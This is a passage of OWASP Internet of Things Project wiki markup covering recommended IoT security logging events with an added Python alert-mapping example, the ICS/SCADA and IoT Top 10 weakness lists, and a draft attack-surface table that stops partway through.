* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
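Each row above names an event a device or its backend should be able to emit. The block below is an added example, not OWASP AppSensor or OWASP IoT project code, that turns a stream of constructed device events into those named exceptions while keeping only the state each one needs: a failure count per user, a sliding window per source, the source seen when a session was created, and the enrolment roster. The event schema, thresholds and device identifiers are assumptions.<br />

```python
from collections import defaultdict, deque

ALLOWED_METHODS = {"GET", "POST", "PUT", "DELETE"}
MAX_PARAM_LEN = 256            # assumed limit for "Unexpected Quantity of Characters"
FAILED_PW_THRESHOLD = 5        # "Multiple Failed Passwords"
RATE_WINDOW_S = 60             # "High Rate of Login Attempts": more than RATE_THRESHOLD
RATE_THRESHOLD = 20            #   attempts from one source inside RATE_WINDOW_S seconds


class IoTEventMonitor:
    def __init__(self, enrolled_devices):
        self.enrolled = set(enrolled_devices)
        self.disenrolled = set()
        self.failed = defaultdict(int)        # user -> consecutive failed passwords
        self.attempts = defaultdict(deque)    # source -> timestamps of recent attempts
        self.session_src = {}                 # session id -> source seen at creation

    def disenroll(self, device_id):
        self.enrolled.discard(device_id)
        self.disenrolled.add(device_id)

    def process(self, ev):
        """Map one event dict to the list of exception names it triggers."""
        alerts = []
        kind = ev["kind"]
        if kind == "http":
            if ev["method"] not in ALLOWED_METHODS:
                alerts.append("Attempt to Invoke Unsupported HTTP Method")
            if ev.get("param_len", 0) > MAX_PARAM_LEN:
                alerts.append("Unexpected Quantity of Characters in Parameter")
        elif kind == "login":
            window = self.attempts[ev["src"]]
            window.append(ev["ts"])
            while window and ev["ts"] - window[0] > RATE_WINDOW_S:
                window.popleft()
            if len(window) > RATE_THRESHOLD:
                alerts.append("High Rate of Login Attempts")
            if ev["ok"]:
                self.failed[ev["user"]] = 0
                # The auth layer sets this flag; the password itself is never logged.
                if ev.get("default_creds"):
                    alerts.append("Device Accessed Using Default Administrative Credentials")
            else:
                self.failed[ev["user"]] += 1
                if self.failed[ev["user"]] == FAILED_PW_THRESHOLD:
                    alerts.append("Multiple Failed Passwords")
        elif kind == "session":
            origin = self.session_src.setdefault(ev["session"], ev["src"])
            if origin != ev["src"]:
                alerts.append("Source Location Changes During Session")
        elif kind == "traffic":
            if ev["device"] in self.disenrolled:
                alerts.append("Traffic Seen from Disenrolled System")
            elif ev["device"] not in self.enrolled:
                alerts.append("Traffic Seen from Unenrolled System")
        elif kind == "tamper":
            alerts.append("Device Case Tampering Detected" if ev["where"] == "case"
                          else "Device Logic Board Tampering Detected")
        return alerts


def constructed_events():
    """A short, made-up event stream for one device over a few seconds."""
    events = [{"kind": "http", "ts": 1, "src": "10.0.0.5", "method": "TRACE", "param_len": 12}]
    events += [{"kind": "login", "ts": 2 + i, "src": "10.0.0.5", "user": "admin", "ok": False}
               for i in range(FAILED_PW_THRESHOLD)]
    events += [
        {"kind": "login", "ts": 8, "src": "10.0.0.9", "user": "admin", "ok": True, "default_creds": True},
        {"kind": "session", "ts": 9, "src": "10.0.0.9", "session": "s1"},
        {"kind": "session", "ts": 10, "src": "203.0.113.7", "session": "s1"},
        {"kind": "traffic", "ts": 11, "device": "dev-42"},
        {"kind": "traffic", "ts": 12, "device": "dev-99"},
        {"kind": "tamper", "ts": 13, "where": "case"},
    ]
    return events


def run_sample():
    """Run the constructed stream; dev-41 is enrolled, dev-42 was enrolled and then removed."""
    mon = IoTEventMonitor(["dev-41", "dev-42"])
    mon.disenroll("dev-42")
    return [(ev["ts"], alert) for ev in constructed_events() for alert in mon.process(ev)]
```

Each exception carries only the state it needs, which is what makes this feasible on a constrained device. The thresholds are a deployment choice. The tamper and default-credential events should be recorded even while the device has no connectivity and forwarded when it reconnects, because those are exactly the events an attacker with physical access most wants to suppress.<br />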
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Security Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to serve as input for a solid detection and response program, and companies that want to build one have few good resources on what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington DC.<br />
<br />
Addressing these mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246187OWASP Internet of Things Project2018-12-19T23:55:49Z<p>Aaron.guzman: /* Contributors */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the 2018 OWASP IoT Top 10.<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security], and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon it, you distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 10 2018 Contributors ==<br />
* Vishruta Rudresh<br />
* Vijayamurugan Pushpanathan<br />
* Aaron Guzman<br />
* Alexander Lafrenz<br />
* Masahiro Murashima<br />
* Charlie Worrell<br />
* José A. Rivas (jarv)<br />
* Pablo Endres<br />
* Ade Yoseman<br />
* Cédric Levy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion (Designer)<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single static encryption/decryption key (shared across devices)<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
